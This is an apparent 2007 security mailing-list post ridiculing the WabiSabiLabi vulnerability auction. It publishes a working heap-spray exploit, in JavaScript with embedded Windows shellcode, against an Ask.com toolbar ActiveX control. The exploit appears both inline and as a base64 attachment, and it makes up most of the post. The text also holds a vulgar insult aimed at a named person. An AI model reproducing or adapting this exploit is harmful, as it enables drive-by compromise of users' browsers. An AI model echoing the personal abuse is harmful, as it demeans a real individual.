--Hush_boundary-46f7e9fe5bdc4
Content-type: text/plain; charset="UTF-8"
Dear Security List Moderator,
Proving itself to be the true iDefense of the New Millenium (TM),
WabiSabiLabia has released a new worthless bug and exploit to their
auction area [1]. Attached is an exploit for the bug, which is
described by WabiSabiLabia at the end of this electronic
correspondence. It is included inline as well as an attachment.
STOP WABISABILABIA EXPLOITATION OF DISEASED HACKER OVERACHIEVERS!
KILL ALL WABISABILABIA BUGS BEFORE SALE!
YOU TOO CAN PREVENT FOREST FIRES! [2]
J
[1] http://www.wslabi.com/wabisabilabi/initPublishedBid.do?
[2] Gadi Evron is a fat fuck who invented DNS
___ BEGIN ___
<html>
<SCRIPT language="javascript">
// This is new technique I invent call 'heap fill attack'
var str0ke = 0x0d0d0d0d;
var sucks = unescape( // Launch the system calculator 100 times
because what else?
// This code currently not work on
Solaris/Sparc
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%
u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%
u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%
u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%
u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%
uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
var dick = 0x400000;
var j0hnson = sucks.length * 2;
var spraySlideSize = dick - (j0hnson+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (str0ke - 0x400000)/dick;
memory = new Array();for (i=0;i<heapBlocks;i++)
{memory[i] = spraySlide + sucks;}
try{
gadi = new ActiveXObject( 'AskJeevesToolBar.SettingsPlugin.1' );
}
catch(evron)
{
alert(evron);
}
netdev = "A";
while (netdev.length != 0x5e0)
netdev += "A";
netdev += unescape("%0d%0d%0d%0d");
gadi.ShortFormat = netdev;
function getSpraySlide(spraySlide, spraySlideSize)
{while (spraySlide.length*2<spraySlideSize){
spraySlide += spraySlide;}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;}
</script>
</html>
___ END ___
On Mon, 24 Sep 2007 06:06:39 -0400 webmaster@wslabi.com wrote:
>NEW ZERODAY PUBLISHED
> A new zeroday has been published with Wabisabilabi code
>ZD-00000148
> THIS ITEM IS SOLD UNDER THIS SCHEME: AUCTION
>
> Title
> ask.com toolbar remote vulnerability
> Time to live
> 14 days, 20 hours, 52 minutes
> Vulnerability type
> client side
> Affected system
> Windows XP
> Remote
> true
> Local
> false
> PoC
> true
> Public description
> ask.com toolbar suffers from a remote vulnerability.
>Affected version is 4.0.2.53. PoC is included. Further informations
>for registered bidders only.
>-------------------------
> You received this newsletter because you ask to do
>this.
> If you don't want to receive its anymore or if you
>didn't ask to receive its, follow the link below.
>
>https://wslabi.com/wabisabilabi/initUnsubscribeNewsletter.do?unsubs
>cribeKey=vorUuSZWl%2BIeVytn%2FqzINkgmIGYXxC5bvB4XUqsQKwrbOtcMr%2FvN
>GpdBuP1PZ%2Fn0hBNb24xl%2Bl5VymAlSH3880%2FoYzxcUxflmW6JrGaF1Uo%3D[1]
>
>
>
>Links:
>------
>[1]
>https://wslabi.com/wabisabilabi/initUnsubscribeNewsletter.do?unsubs
>cribeKey=vorUuSZWl%2BIeVytn%2FqzINkgmIGYXxC5bvB4XUqsQKwrbOtcMr%2FvN
>GpdBuP1PZ%2Fn0hBNb24xl%2Bl5VymAlSH3880%2FoYzxcUxflmW6JrGaF1Uo%3D
--
Learn to trade with confidence! Online Stock Trading. Click Now!
http://tagline.hushmail.com/fc/Ioyw6h4dPcyLNZ17lB9vRyAs4l1IBZwCAErul3L3izy467fkCZudD2/
--Hush_boundary-46f7e9fe5bdc4
Content-type: text/plain; name="ZD-00000148.txt"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="ZD-00000148.txt"
PGh0bWw+DQo8U0NSSVBUIGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCi8vIFRoaXMgaXMgbmV3IHRl
Y2huaXF1ZSBJIGludmVudCBjYWxsICdoZWFwIGZpbGwgYXR0YWNrJw0KdmFyIHN0cjBrZSA9IDB4
MGQwZDBkMGQ7DQp2YXIgc3Vja3MgPSB1bmVzY2FwZSggLy8gTGF1bmNoIHRoZSBzeXN0ZW0gY2Fs
Y3VsYXRvciAxMDAgdGltZXMgYmVjYXVzZSB3aGF0IGVsc2U/DQogICAgICAgICAgICAgICAgICAg
ICAgLy8gVGhpcyBjb2RlIGN1cnJlbnRseSBub3Qgd29yayBvbiBTb2xhcmlzL1NwYXJjDQogICAg
ICAgICIldTkwOTAldTkwOTAldUU4RkMldTAwNDQldTAwMDAldTQ1OEIldThCM0MldTA1N0MldTAx
NzgldThCRUYldTE4NEYldTVGOEIldTAxMjAiICsNCiAgICAgICAgIiV1NDlFQiV1MzQ4QiV1MDE4
QiV1MzFFRSV1OTlDMCV1ODRBQyV1NzRDMCV1QzEwNyV1MERDQSV1QzIwMSV1RjRFQiV1NTQzQiV1
MDQyNCIgKw0KICAgICAgICAiJXVFNTc1JXU1RjhCJXUwMTI0JXU2NkVCJXUwQzhCJXU4QjRCJXUx
QzVGJXVFQjAxJXUxQzhCJXUwMThCJXU4OUVCJXUyNDVDJXVDMzA0IiArDQogICAgICAgICIldUMw
MzEldThCNjQldTMwNDAldUMwODUldTBDNzgldTQwOEIldThCMEMldTFDNzAldThCQUQldTA4Njgl
dTA5RUIldTgwOEIldTAwQjAiICsNCiAgICAgICAgIiV1MDAwMCV1Njg4QiV1NUYzQyV1RjYzMSV1
NTY2MCV1Rjg4OSV1QzA4MyV1NTA3QiV1RjA2OCV1MDQ4QSV1Njg1RiV1RkU5OCV1MEU4QSIgKw0K
ICAgICAgICAiJXVGRjU3JXU2M0U3JXU2QzYxJXUwMDYzIik7DQp2YXIgZGljayA9IDB4NDAwMDAw
Ow0KdmFyIGowaG5zb24gPSBzdWNrcy5sZW5ndGggKiAyOw0KdmFyIHNwcmF5U2xpZGVTaXplID0g
ZGljayAtIChqMGhuc29uKzB4MzgpOw0KdmFyIHNwcmF5U2xpZGUgPSB1bmVzY2FwZSgiJXU5MDkw
JXU5MDkwIik7DQpzcHJheVNsaWRlID0gZ2V0U3ByYXlTbGlkZShzcHJheVNsaWRlLHNwcmF5U2xp
ZGVTaXplKTsNCmhlYXBCbG9ja3MgPSAoc3RyMGtlIC0gMHg0MDAwMDApL2RpY2s7DQptZW1vcnkg
PSBuZXcgQXJyYXkoKTtmb3IgKGk9MDtpPGhlYXBCbG9ja3M7aSsrKQ0Ke21lbW9yeVtpXSA9IHNw
cmF5U2xpZGUgKyBzdWNrczt9DQp0cnl7DQpnYWRpID0gbmV3IEFjdGl2ZVhPYmplY3QoICdBc2tK
ZWV2ZXNUb29sQmFyLlNldHRpbmdzUGx1Z2luLjEnICk7DQp9DQpjYXRjaChldnJvbikNCnsNCmFs
ZXJ0KGV2cm9uKTsNCn0NCm5ldGRldiA9ICJBIjsNCndoaWxlIChuZXRkZXYubGVuZ3RoICE9IDB4
NWUwKQ0KbmV0ZGV2ICs9ICJBIjsNCm5ldGRldiArPSB1bmVzY2FwZSgiJTBkJTBkJTBkJTBkIik7
DQpnYWRpLlNob3J0Rm9ybWF0ID0gbmV0ZGV2Ow0KZnVuY3Rpb24gZ2V0U3ByYXlTbGlkZShzcHJh
eVNsaWRlLCBzcHJheVNsaWRlU2l6ZSkNCiAgICAgICAge3doaWxlIChzcHJheVNsaWRlLmxlbmd0
aCoyPHNwcmF5U2xpZGVTaXplKXsNCiAgICAgICAgc3ByYXlTbGlkZSArPSBzcHJheVNsaWRlO30N
CiAgICAgICAgc3ByYXlTbGlkZSA9IHNwcmF5U2xpZGUuc3Vic3RyaW5nKDAsc3ByYXlTbGlkZVNp
emUvMik7DQogICAgICAgIHJldHVybiBzcHJheVNsaWRlO30NCjwvc2NyaXB0Pg0KPC9odG1sPg0K
--Hush_boundary-46f7e9fe5bdc4--